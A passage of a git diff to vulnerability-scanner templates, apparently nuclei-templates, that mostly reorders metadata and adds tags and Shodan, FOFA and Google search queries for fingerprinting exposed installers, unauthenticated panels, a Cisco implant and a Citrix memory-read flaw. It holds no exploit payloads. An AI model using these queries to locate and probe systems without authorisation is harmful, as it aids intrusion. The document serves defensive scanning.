h2o-3,h2o,info-leak,lfi,misconfig http: - raw: diff --git a/http/misconfiguration/https-to-http-redirect.yaml b/http/misconfiguration/https-to-http-redirect.yaml index 5419f82670..d3e4368b5e 100644 --- a/http/misconfiguration/https-to-http-redirect.yaml +++ b/http/misconfiguration/https-to-http-redirect.yaml @@ -7,8 +7,8 @@ info: description: | Detects whether there is a redirect from https:// to http:// metadata: - max-request: 1 verified: true + max-request: 1 tags: misconfig,http,https http: diff --git a/http/misconfiguration/imgproxy-unauth.yaml b/http/misconfiguration/imgproxy-unauth.yaml index 5983e67f77..a6fca7798c 100644 --- a/http/misconfiguration/imgproxy-unauth.yaml +++ b/http/misconfiguration/imgproxy-unauth.yaml @@ -1,23 +1,22 @@ id: imgproxy-unauth -info: - name: Imgproxy Unauthorized Access - author: userdehghani - severity: low - description: | - imgproxy is a fast and secure standalone server for resizing, processing, and converting images. - remediation: set IMGPROXY_SECRET environment variable. - reference: - - https://docs.imgproxy.net/configuration/options - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - metadata: - verified: true - max-request: 1 - shodan-query: html:"imgproxy" - tags: imgproxy,unauth,misconfig - +info: + name: Imgproxy Unauthorized Access + author: userdehghani + severity: low + description: | + imgproxy is a fast and secure standalone server for resizing, processing, and converting images. + remediation: set IMGPROXY_SECRET environment variable. + reference: + - https://docs.imgproxy.net/configuration/options + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + metadata: + verified: true + max-request: 1 + shodan-query: html:"imgproxy" + tags: imgproxy,unauth,misconfig variables: img_url: 'https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Google_2015_logo.svg/375px-Google_2015_logo.svg.png' diff --git a/http/misconfiguration/installer/drupal-install.yaml b/http/misconfiguration/installer/drupal-install.yaml index 734fee7e5b..c774464177 100644 --- a/http/misconfiguration/installer/drupal-install.yaml +++ b/http/misconfiguration/installer/drupal-install.yaml @@ -7,7 +7,11 @@ info: description: Drupal Install panel exposed. metadata: max-request: 2 - shodan-query: http.component:"drupal" + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" + product: drupal + vendor: drupal tags: misconfig,drupal,install,exposure http: diff --git a/http/misconfiguration/installer/eyoucms-installer.yaml b/http/misconfiguration/installer/eyoucms-installer.yaml index 137206ec8e..a1eb96e603 100644 --- a/http/misconfiguration/installer/eyoucms-installer.yaml +++ b/http/misconfiguration/installer/eyoucms-installer.yaml @@ -9,6 +9,8 @@ info: verified: true max-request: 1 fofa-query: title="eyoucms" + product: eyoucms + vendor: eyoucms tags: misconfig,eyoucms,install http: diff --git a/http/misconfiguration/installer/gibbon-installer.yaml b/http/misconfiguration/installer/gibbon-installer.yaml index 7712fd4c97..42fcfede47 100644 --- a/http/misconfiguration/installer/gibbon-installer.yaml +++ b/http/misconfiguration/installer/gibbon-installer.yaml @@ -9,6 +9,9 @@ info: verified: true max-request: 1 fofa-query: icon_hash="-165631681" + product: gibbon + vendor: gibbonedu + shodan-query: http.favicon.hash:"-165631681" tags: misconfig,gibbon,install,exposure http: diff --git a/http/misconfiguration/installer/ids-skills-installer.yaml b/http/misconfiguration/installer/ids-skills-installer.yaml index 0751655fde..affa7b1e01 100644 --- a/http/misconfiguration/installer/ids-skills-installer.yaml +++ b/http/misconfiguration/installer/ids-skills-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"IDP Skills Installer" - tags: install,ids,exposure + tags: install,ids,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/trilium-notes-installer.yaml b/http/misconfiguration/installer/trilium-notes-installer.yaml index 1fbdd2c816..34668b6e91 100644 --- a/http/misconfiguration/installer/trilium-notes-installer.yaml +++ b/http/misconfiguration/installer/trilium-notes-installer.yaml @@ -7,7 +7,8 @@ info: description: | Detects if the Trilium Notes setup page is accessible. metadata: - shodan-query: html:"Trilium Notes" + max-request: 1 + shodan-query: "html:\"Trilium Notes\"" tags: trilium,setup,misconfig,installer http: diff --git a/http/misconfiguration/installer/zabbix-installer.yaml b/http/misconfiguration/installer/zabbix-installer.yaml index 3eee94ddcd..92831ebb02 100644 --- a/http/misconfiguration/installer/zabbix-installer.yaml +++ b/http/misconfiguration/installer/zabbix-installer.yaml @@ -8,7 +8,17 @@ info: metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:892542951 + shodan-query: + - http.favicon.hash:892542951 + - http.title:"zabbix-server" + - cpe:"cpe:2.3:a:zabbix:zabbix" + product: zabbix + vendor: zabbix + fofa-query: + - icon_hash=892542951 + - app="zabbix-监控系统" && body="saml" + - title="zabbix-server" + google-query: intitle:"zabbix-server" tags: misconfig,zabbix,install,exposure http: diff --git a/http/misconfiguration/intelbras-dvr-unauth.yaml b/http/misconfiguration/intelbras-dvr-unauth.yaml index 8ae6290609..251e22e15d 100644 --- a/http/misconfiguration/intelbras-dvr-unauth.yaml +++ b/http/misconfiguration/intelbras-dvr-unauth.yaml @@ -10,7 +10,8 @@ info: - https://github.com/netsecfish/intelbras_cap_js metadata: verified: true - fofa-query: body="Intelbras" + max-request: 1 + fofa-query: "body=\"Intelbras\"" tags: unauth,intelbras,dvr,misconfig http: diff --git a/http/misconfiguration/mlflow-unauth.yaml b/http/misconfiguration/mlflow-unauth.yaml index 8a4b68fe84..d8590910d7 100644 --- a/http/misconfiguration/mlflow-unauth.yaml +++ b/http/misconfiguration/mlflow-unauth.yaml @@ -11,6 +11,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"mlflow" + product: mlflow + vendor: lfprojects + fofa-query: + - app="mlflow" + - title="mlflow" + google-query: intitle:"mlflow" tags: unauth,mlflow,oss,misconfig http: diff --git a/http/misconfiguration/node-express-dev-env.yaml b/http/misconfiguration/node-express-dev-env.yaml index 580dc440b4..e5c79d4ac6 100644 --- a/http/misconfiguration/node-express-dev-env.yaml +++ b/http/misconfiguration/node-express-dev-env.yaml @@ -10,11 +10,10 @@ info: - https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/express-development-mode-is-enabled/ - https://www.synopsys.com/blogs/software-security/nodejs-mean-stack-vulnerabilities.html metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: "X-Powered-By: Express" tags: nodejs,express,misconfig,devops,cicd,trace - flow: http(1) && http(2) http: diff --git a/http/misconfiguration/php/php-composer-binary.yaml b/http/misconfiguration/php/php-composer-binary.yaml index 53ff3e953d..f6467767c7 100644 --- a/http/misconfiguration/php/php-composer-binary.yaml +++ b/http/misconfiguration/php/php-composer-binary.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: php,composer,exposure + tags: php,composer,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/sap/sap-netweaver-info-leak.yaml b/http/misconfiguration/sap/sap-netweaver-info-leak.yaml index 0010b5b742..cb72e96164 100644 --- a/http/misconfiguration/sap/sap-netweaver-info-leak.yaml +++ b/http/misconfiguration/sap/sap-netweaver-info-leak.yaml @@ -11,6 +11,9 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 + product: content_server + vendor: sap + fofa-query: icon_hash=-266008933 tags: sap,misconfig http: diff --git a/http/misconfiguration/thanos-prometheus-exposure.yaml b/http/misconfiguration/thanos-prometheus-exposure.yaml index a77007e609..3862ffe8ed 100644 --- a/http/misconfiguration/thanos-prometheus-exposure.yaml +++ b/http/misconfiguration/thanos-prometheus-exposure.yaml @@ -9,7 +9,7 @@ info: max-request: 1 shodan-query: title:"Thanos | Highly available Prometheus setup" fofa-query: icon_hash="29632872" - tags: thanos,prometheus,exposure,setup + tags: thanos,prometheus,exposure,setup,misconfig http: - method: GET diff --git a/http/misconfiguration/unigui-server-monitor-exposure.yaml b/http/misconfiguration/unigui-server-monitor-exposure.yaml index ff0d6eee1f..8def1f6c80 100644 --- a/http/misconfiguration/unigui-server-monitor-exposure.yaml +++ b/http/misconfiguration/unigui-server-monitor-exposure.yaml @@ -1,20 +1,20 @@ id: unigui-server-monitor-exposure -info: - name: UniGUI Server Monitor Panel - Exposure - author: serrapa - severity: low - description: | - Detects exposed UniGUI Server Monitor Panels which could reveal sensitive server statistics, users sessions, licensing information and others data. - reference: - - https://www.unigui.com/doc/online_help/using-server-monitor-(server-c.htm - metadata: - verified: true - max-request: 1 - shodan-query: title:"uniGUI" - fofa-query: title="uniGUI" - tags: exposure,unigui,misconfig - +info: + name: UniGUI Server Monitor Panel - Exposure + author: serrapa + severity: low + description: | + Detects exposed UniGUI Server Monitor Panels which could reveal sensitive server statistics, users sessions, licensing information and others data. + reference: + - https://www.unigui.com/doc/online_help/using-server-monitor-(server-c.htm + metadata: + verified: true + max-request: 1 + shodan-query: title:"uniGUI" + fofa-query: title="uniGUI" + tags: exposure,unigui,misconfig + http: - method: GET path: diff --git a/http/osint/user-enumeration/piratebay.yaml b/http/osint/user-enumeration/piratebay.yaml index b30047584c..f9eff9ee7f 100644 --- a/http/osint/user-enumeration/piratebay.yaml +++ b/http/osint/user-enumeration/piratebay.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: osint,osint-p2p,piratebay + tags: osint,osint-p2p,piratebay,headless self-contained: true diff --git a/http/takeovers/worksites-takeover.yaml b/http/takeovers/worksites-takeover.yaml index 2b067146e8..8affdd7150 100644 --- a/http/takeovers/worksites-takeover.yaml +++ b/http/takeovers/worksites-takeover.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 2 - tags: takeover + tags: takeover,dns dns: - name: "{{FQDN}}" diff --git a/http/technologies/apache/apache-answer-detect.yaml b/http/technologies/apache/apache-answer-detect.yaml index 47afbcc440..29af3cc441 100644 --- a/http/technologies/apache/apache-answer-detect.yaml +++ b/http/technologies/apache/apache-answer-detect.yaml @@ -9,10 +9,10 @@ info: reference: - https://answer.apache.org/ metadata: - shodan-query: http.favicon.hash:523757057 - fofa-query: icon_hash="523757057" verified: true max-request: 1 + shodan-query: http.favicon.hash:523757057 + fofa-query: icon_hash="523757057" tags: detect,tech,apache http: diff --git a/http/technologies/apache/tomcat-detect.yaml b/http/technologies/apache/tomcat-detect.yaml index c1d58959c9..75833041d5 100644 --- a/http/technologies/apache/tomcat-detect.yaml +++ b/http/technologies/apache/tomcat-detect.yaml @@ -4,15 +4,22 @@ info: name: Tomcat Detection author: philippedelteil,dhiyaneshDk,AdamCrosser severity: info - description: If an Tomcat instance is deployed on the target URL, when we send a - request for a non existent resource we receive a Tomcat error page with version. + description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version. classification: cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: apache product: tomcat - shodan-query: title:"Apache Tomcat" + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" + google-query: intitle:"apache tomcat" tags: tech,tomcat,apache,intrusive http: diff --git a/http/technologies/arcgis-rest-api.yaml b/http/technologies/arcgis-rest-api.yaml index 826ea043f3..d946ef6c7f 100644 --- a/http/technologies/arcgis-rest-api.yaml +++ b/http/technologies/arcgis-rest-api.yaml @@ -14,7 +14,7 @@ info: max-request: 1 vendor: esri product: arcgis_engine - tags: api,arcgis,cms,tech + tags: api,arcgis,cms,tech,esri http: - method: GET diff --git a/http/technologies/arcgis-tokens.yaml b/http/technologies/arcgis-tokens.yaml index 4f0e54c77a..362f22e5a5 100644 --- a/http/technologies/arcgis-tokens.yaml +++ b/http/technologies/arcgis-tokens.yaml @@ -14,8 +14,12 @@ info: max-request: 1 vendor: esri product: arcgis_server - shodan-query: title:"ArcGIS" - tags: tech,arcgis,tokens,detect + shodan-query: + - title:"ArcGIS" + - http.title:"arcgis" + fofa-query: title="arcgis" + google-query: intitle:"arcgis" + tags: tech,arcgis,tokens,detect,esri http: - method: GET diff --git a/http/technologies/boa-web-server.yaml b/http/technologies/boa-web-server.yaml index 53c893383c..a18acd11b2 100644 --- a/http/technologies/boa-web-server.yaml +++ b/http/technologies/boa-web-server.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - shodan-query: "Server: Boa/" verified: true max-request: 1 + shodan-query: "Server: Boa/" tags: boa,tech http: diff --git a/http/technologies/celebrus-detect.yaml b/http/technologies/celebrus-detect.yaml index 2b06b610ab..ebf2295bc9 100644 --- a/http/technologies/celebrus-detect.yaml +++ b/http/technologies/celebrus-detect.yaml @@ -1,19 +1,19 @@ id: celebrus-detect -info: - name: Celebrus - Detect - author: righettod - severity: info - description: | - Celebrus was detected. - reference: - - https://investors.celebrus.com/ - metadata: - max-request: 1 - verified: true - shodan-query: http.title:"Celebrus" - tags: tech,celebrus,detect - +info: + name: Celebrus - Detect + author: righettod + severity: info + description: | + Celebrus was detected. + reference: + - https://investors.celebrus.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Celebrus" + tags: tech,celebrus,detect + http: - method: GET path: diff --git a/http/technologies/citrix-xenmobile-version.yaml b/http/technologies/citrix-xenmobile-version.yaml index 75a1af605d..20bcfdd879 100644 --- a/http/technologies/citrix-xenmobile-version.yaml +++ b/http/technologies/citrix-xenmobile-version.yaml @@ -8,8 +8,8 @@ info: Template for XenMobile-detection (even if login-page is deactivated) and the specific version and rolling patch from js/app/init.js endpoint metadata: verified: true - max-request: 1 - shodan-query: title:"XenMobile - Console" + max-request: 2 + shodan-query: "title:\"XenMobile - Console\"" tags: tech,edb,citrix,version,detect flow: http(1) && http(2) diff --git a/http/technologies/confluence-detect.yaml b/http/technologies/confluence-detect.yaml index dca5852e6f..4c587d6fb6 100644 --- a/http/technologies/confluence-detect.yaml +++ b/http/technologies/confluence-detect.yaml @@ -12,7 +12,9 @@ info: max-request: 5 vendor: atlassian product: confluence_server - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" category: productivity tags: tech,confluence,atlassian,detect diff --git a/http/technologies/cowboy-detect.yaml b/http/technologies/cowboy-detect.yaml index 8e9c23297a..fc77dc89b1 100644 --- a/http/technologies/cowboy-detect.yaml +++ b/http/technologies/cowboy-detect.yaml @@ -8,8 +8,8 @@ info: reference: - https://github.com/ninenines/cowboy metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: "cowboy" tags: tech,cowboy,detect diff --git a/http/technologies/craftercms-detect.yaml b/http/technologies/craftercms-detect.yaml index 7389a1e9c3..8d7fd38f02 100644 --- a/http/technologies/craftercms-detect.yaml +++ b/http/technologies/craftercms-detect.yaml @@ -1,19 +1,19 @@ id: craftercms-detect -info: - name: CrafterCMS - Detect - author: righettod - severity: info - description: | - CrafterCMS was detected. - reference: - - https://craftercms.org/ - metadata: - max-request: 1 - verified: true - shodan-query: http.title:"craftercms" - tags: tech,craftercms,detect - +info: + name: CrafterCMS - Detect + author: righettod + severity: info + description: | + CrafterCMS was detected. + reference: + - https://craftercms.org/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"craftercms" + tags: tech,craftercms,detect + http: - method: GET path: diff --git a/http/technologies/erxes-detect.yaml b/http/technologies/erxes-detect.yaml index ba864b7aeb..62372781a2 100644 --- a/http/technologies/erxes-detect.yaml +++ b/http/technologies/erxes-detect.yaml @@ -7,6 +7,10 @@ info: metadata: max-request: 1 shodan-query: http.title:"erxes" + product: erxes + vendor: erxes + fofa-query: title="erxes" + google-query: intitle:"erxes" tags: tech,erxes http: diff --git a/http/technologies/harbor-detect.yaml b/http/technologies/harbor-detect.yaml index 00547129c7..c81217c93c 100644 --- a/http/technologies/harbor-detect.yaml +++ b/http/technologies/harbor-detect.yaml @@ -11,6 +11,9 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:657337228 + product: harbor + vendor: linuxfoundation + fofa-query: icon_hash=657337228 tags: tech,harbor http: diff --git a/http/technologies/hikvision-detect.yaml b/http/technologies/hikvision-detect.yaml index dbfcee8a82..db5524b080 100644 --- a/http/technologies/hikvision-detect.yaml +++ b/http/technologies/hikvision-detect.yaml @@ -8,6 +8,9 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:999357577 + product: ds-2cd2026g2-iu\/sl_firmware + vendor: hikvision + fofa-query: icon_hash=999357577 tags: tech,hikvision http: diff --git a/http/technologies/jenkins-detect.yaml b/http/technologies/jenkins-detect.yaml index cfff834f0b..77d441dddb 100644 --- a/http/technologies/jenkins-detect.yaml +++ b/http/technologies/jenkins-detect.yaml @@ -14,8 +14,12 @@ info: max-request: 2 vendor: jenkins product: jenkins - shodan-query: http.favicon.hash:81586312 + shodan-query: + - http.favicon.hash:81586312 + - cpe:"cpe:2.3:a:jenkins:jenkins" + - product:"jenkins" category: devops + fofa-query: icon_hash=81586312 tags: tech,jenkins,detect http: diff --git a/http/technologies/jira-detect.yaml b/http/technologies/jira-detect.yaml index ae9adaad03..c3983e285d 100644 --- a/http/technologies/jira-detect.yaml +++ b/http/technologies/jira-detect.yaml @@ -15,6 +15,10 @@ info: vendor: atlassian product: jira category: productivity + shodan-query: + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: tech,panel,jira,atlassian http: diff --git a/http/technologies/meilisearch-detect.yaml b/http/technologies/meilisearch-detect.yaml index e5593da0b4..f755b209e2 100644 --- a/http/technologies/meilisearch-detect.yaml +++ b/http/technologies/meilisearch-detect.yaml @@ -1,19 +1,19 @@ id: meilisearch-detect -info: - name: Meilisearch - Detect - author: userdehghani - severity: info - description: | - An open-source, blazingly fast, and hyper-relevant search engine that will improve your search experience. - reference: - - https://www.meilisearch.com/ - metadata: - verified: true - max-request: 1 - fofa-query: app="meilisearch" - tags: meilisearch,detect,tech - +info: + name: Meilisearch - Detect + author: userdehghani + severity: info + description: | + An open-source, blazingly fast, and hyper-relevant search engine that will improve your search experience. + reference: + - https://www.meilisearch.com/ + metadata: + verified: true + max-request: 1 + fofa-query: app="meilisearch" + tags: meilisearch,detect,tech + http: - method: GET path: diff --git a/http/technologies/microfocus-iprint-detect.yaml b/http/technologies/microfocus-iprint-detect.yaml index bde012dc46..be4ccdad76 100644 --- a/http/technologies/microfocus-iprint-detect.yaml +++ b/http/technologies/microfocus-iprint-detect.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.opentext.com/products/enterprise-server metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Micro Focus iPrint Appliance" tags: tech,microfocus,detect diff --git a/http/technologies/microweber-detect.yaml b/http/technologies/microweber-detect.yaml index 52947ee5a2..25ae799b08 100644 --- a/http/technologies/microweber-detect.yaml +++ b/http/technologies/microweber-detect.yaml @@ -8,7 +8,14 @@ info: - https://github.com/microweber/microweber metadata: max-request: 1 - shodan-query: http.favicon.hash:780351152 + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + product: microweber + vendor: microweber + fofa-query: + - icon_hash=780351152 + - body="microweber" tags: tech,microweber,oss http: diff --git a/http/technologies/monstracms-detect.yaml b/http/technologies/monstracms-detect.yaml index 9509397862..b50b9c16d2 100644 --- a/http/technologies/monstracms-detect.yaml +++ b/http/technologies/monstracms-detect.yaml @@ -10,6 +10,9 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:419828698 + product: monstra_cms + vendor: monstra + fofa-query: icon_hash=419828698 tags: tech,monstra,monstracms http: diff --git a/http/technologies/piwigo-detect.yaml b/http/technologies/piwigo-detect.yaml index 556fde95b3..8a08d33bc4 100644 --- a/http/technologies/piwigo-detect.yaml +++ b/http/technologies/piwigo-detect.yaml @@ -6,7 +6,13 @@ info: severity: info metadata: max-request: 1 - fofa-query: title="piwigo" + fofa-query: + - title="piwigo" + - icon_hash=540706145 + product: piwigo + vendor: piwigo + google-query: powered by piwigo + shodan-query: http.favicon.hash:540706145 tags: piwigo,tech http: diff --git a/http/technologies/privatebin-detect.yaml b/http/technologies/privatebin-detect.yaml index cd31f07925..298fd9b837 100644 --- a/http/technologies/privatebin-detect.yaml +++ b/http/technologies/privatebin-detect.yaml @@ -1,19 +1,19 @@ id: privatebin-detect -info: - name: PrivateBin - Detect - author: righettod - severity: info - description: | - PrivateBin was detected. - reference: - - https://privatebin.info/ - metadata: - max-request: 1 - verified: true - shodan-query: title:"PrivateBin" - tags: tech,privatebin,detect - +info: + name: PrivateBin - Detect + author: righettod + severity: info + description: | + PrivateBin was detected. + reference: + - https://privatebin.info/ + metadata: + verified: true + max-request: 1 + shodan-query: title:"PrivateBin" + tags: tech,privatebin,detect + http: - method: GET path: diff --git a/http/technologies/sap/sap-netweaver-detect.yaml b/http/technologies/sap/sap-netweaver-detect.yaml index cfce8f3d35..34c8cdd431 100644 --- a/http/technologies/sap/sap-netweaver-detect.yaml +++ b/http/technologies/sap/sap-netweaver-detect.yaml @@ -10,7 +10,11 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-266008933 - fofa-query: "sap-server:" + fofa-query: + - "sap-server:" + - icon_hash=-266008933 + product: content_server + vendor: sap tags: sap,webserver,tech,detect http: diff --git a/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml b/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml index b3f3ad6f2a..b34657d083 100644 --- a/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml +++ b/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml @@ -8,6 +8,9 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 + product: content_server + vendor: sap + fofa-query: icon_hash=-266008933 tags: sap,webserver,proxy,tech http: diff --git a/http/technologies/simplesamlphp-detect.yaml b/http/technologies/simplesamlphp-detect.yaml index a9bfcaffe4..04fc3f0799 100644 --- a/http/technologies/simplesamlphp-detect.yaml +++ b/http/technologies/simplesamlphp-detect.yaml @@ -9,9 +9,9 @@ info: reference: - https://simplesamlphp.org/ metadata: - max-request: 1 verified: true - shodan-query: http.title:"SimpleSAMLphp installation page" + max-request: 2 + shodan-query: "http.title:\"SimpleSAMLphp installation page\"" tags: tech,simplesamlphp,detect http: diff --git a/http/technologies/sparklighter-detect.yaml b/http/technologies/sparklighter-detect.yaml index 6296410e7b..a51273d57a 100644 --- a/http/technologies/sparklighter-detect.yaml +++ b/http/technologies/sparklighter-detect.yaml @@ -14,7 +14,14 @@ info: vendor: apache product: spark category: productivity - tags: tech,lighter,spark,detect + shodan-query: + - http.html:"/apps/imt/html/" + - http.title:"spark master at" + fofa-query: + - title="spark master at" + - body="/apps/imt/html/" + google-query: intitle:"spark master at" + tags: tech,lighter,spark,detect,apache http: - method: GET diff --git a/http/technologies/tibco-spotfire-services-detect.yaml b/http/technologies/tibco-spotfire-services-detect.yaml index 9094409f3e..4d5eccfeeb 100644 --- a/http/technologies/tibco-spotfire-services-detect.yaml +++ b/http/technologies/tibco-spotfire-services-detect.yaml @@ -9,8 +9,8 @@ info: reference: - https://docs.tibco.com/products/tibco-spotfire-statistics-services metadata: - max-request: 4 verified: true + max-request: 4 shodan-query: "TIBCO Spotfire Server" tags: tech,tibco,detect diff --git a/http/technologies/uni-gui-framework.yaml b/http/technologies/uni-gui-framework.yaml index b004c0dc86..54a9ad6257 100644 --- a/http/technologies/uni-gui-framework.yaml +++ b/http/technologies/uni-gui-framework.yaml @@ -1,17 +1,17 @@ id: uni-gui-framework -info: - name: UniGUI Framework - Detect - author: serrapa - severity: info - description: | - Checks for the presence of UniGUI framework and extracts its version along with the Sencha Ext JS version. - metadata: - verified: true - max-request: 1 - shodan-query: http.title:"UniGUI" - tags: tech,unigui - +info: + name: UniGUI Framework - Detect + author: serrapa + severity: info + description: | + Checks for the presence of UniGUI framework and extracts its version along with the Sencha Ext JS version. + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"UniGUI" + tags: tech,unigui + http: - method: GET path: diff --git a/http/technologies/wordpress-detect.yaml b/http/technologies/wordpress-detect.yaml index 1967dd8e96..7b6a861093 100644 --- a/http/technologies/wordpress-detect.yaml +++ b/http/technologies/wordpress-detect.yaml @@ -11,7 +11,10 @@ info: max-request: 4 vendor: wordpress product: wordpress - shodan-query: http.component:"WordPress" + shodan-query: + - http.component:"WordPress" + - http.component:"wordpress" + - cpe:"cpe:2.3:a:wordpress:wordpress" category: cms tags: tech,wordpress,cms,wp diff --git a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml index 802b5c5f54..5ae5124e3b 100644 --- a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml +++ b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml @@ -1,19 +1,19 @@ id: wp-bricks-builder-theme -info: - name: WordPress Bricks Builder Theme Version - author: Anonymous - severity: info - description: | - - Checks for Bricks Builder Theme versions. - reference: - - https://0day.today/exploit/description/39489 - metadata: - publicwww-query: "/wp-content/themes/bricks/" - verified: true - max-request: 1 - tags: wordpress,theme,wp-theme,wp,bricks - +info: + name: WordPress Bricks Builder Theme Version + author: Anonymous + severity: info + description: | + - Checks for Bricks Builder Theme versions. + reference: + - https://0day.today/exploit/description/39489 + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/themes/bricks/" + tags: wordpress,theme,wp-theme,wp,bricks + http: - method: GET path: diff --git a/http/technologies/yourls-detect.yaml b/http/technologies/yourls-detect.yaml index 4704c9f7c3..4412d10ba7 100644 --- a/http/technologies/yourls-detect.yaml +++ b/http/technologies/yourls-detect.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/YOURLS/YOURLS metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Your Own URL Shortener" fofa-query: title="Your Own URL Shortener" tags: tech,yourls diff --git a/http/token-spray/api-mailchimp.yaml b/http/token-spray/api-mailchimp.yaml index e4b8320148..b7fdf5206c 100644 --- a/http/token-spray/api-mailchimp.yaml +++ b/http/token-spray/api-mailchimp.yaml @@ -8,7 +8,7 @@ info: - https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration metadata: max-request: 1 - tags: token-spray,mailchimp + tags: token-spray,mailchimp,tcp self-contained: true tcp: diff --git a/http/token-spray/api-sendgrid.yaml b/http/token-spray/api-sendgrid.yaml index 3bf3692649..640c4c64ac 100644 --- a/http/token-spray/api-sendgrid.yaml +++ b/http/token-spray/api-sendgrid.yaml @@ -8,7 +8,7 @@ info: - https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp metadata: max-request: 1 - tags: token-spray,sendgrid + tags: token-spray,sendgrid,tcp self-contained: true tcp: diff --git a/http/token-spray/api-travisci.yaml b/http/token-spray/api-travisci.yaml index 1a66071c7a..d0a7a4cace 100644 --- a/http/token-spray/api-travisci.yaml +++ b/http/token-spray/api-travisci.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://developer.travis-ci.com/ - tags: token-spray,travis metadata: max-request: 1 + tags: token-spray,travis self-contained: true http: diff --git a/http/vulnerabilities/backdoor/cisco-implant-detect.yaml b/http/vulnerabilities/backdoor/cisco-implant-detect.yaml index 71631aa5e0..a7a392e134 100644 --- a/http/vulnerabilities/backdoor/cisco-implant-detect.yaml +++ b/http/vulnerabilities/backdoor/cisco-implant-detect.yaml @@ -17,6 +17,8 @@ info: verified: true max-request: 2 shodan-query: http.html_hash:1076109428 + product: ios_xe + vendor: cisco tags: backdoor,cisco,ios,kev http: diff --git a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml index ecd360c0fc..2c43e96099 100644 --- a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml +++ b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml @@ -6,14 +6,14 @@ info: severity: critical description: | The vulnerability would enable an attacker to remotely obtain sensitive information from a NetScaler appliance configured as a Gateway or AAA virtual server via a very commonly connected Web interface, and without requiring authentication. This bug is nearly identical to the Citrix Bleed vulnerability (CVE-2023-4966), except it is less likely to return highly sensitive information to an attacker. - remediation: Update to version 13.1-51.15 or later impact: The vulnerability allows an attacker to recover potentially sensitive data from memory. Although in most cases nothing of value is returned, we have observed instances where POST request bodies are leaked. + remediation: Update to version 13.1-51.15 or later reference: - https://bishopfox.com/blog/netscaler-adc-and-gateway-advisory metadata: - shodan-query: http.favicon.hash:-1292923998,-1166125415 verified: true max-request: 1 + shodan-query: http.favicon.hash:-1292923998,-1166125415 tags: citrix,netscaller,gateway,oob http: diff --git a/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml b/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml index 35aec42c58..bdb1cfdc0d 100644 --- a/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml +++ b/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml @@ -9,8 +9,8 @@ info: - https://tripla.dk/2020/03/26/multiple-vulnerabilities-in-nodejs-ecstatic-http-server-http-party/ metadata: verified: true - shodan-query: 'server: "ecstatic"' max-request: 1 + shodan-query: 'server: "ecstatic"' tags: node,js,listing,ecstatic http: diff --git a/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml b/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml index 560819aeb7..67c27ee937 100644 --- a/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml +++ b/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml @@ -10,6 +10,8 @@ info: verified: true max-request: 1 fofa-query: title="电子文档安全管理系统" + product: electronic_document_security_management_system + vendor: esafenet tags: esafenet,lfi,mysql http: 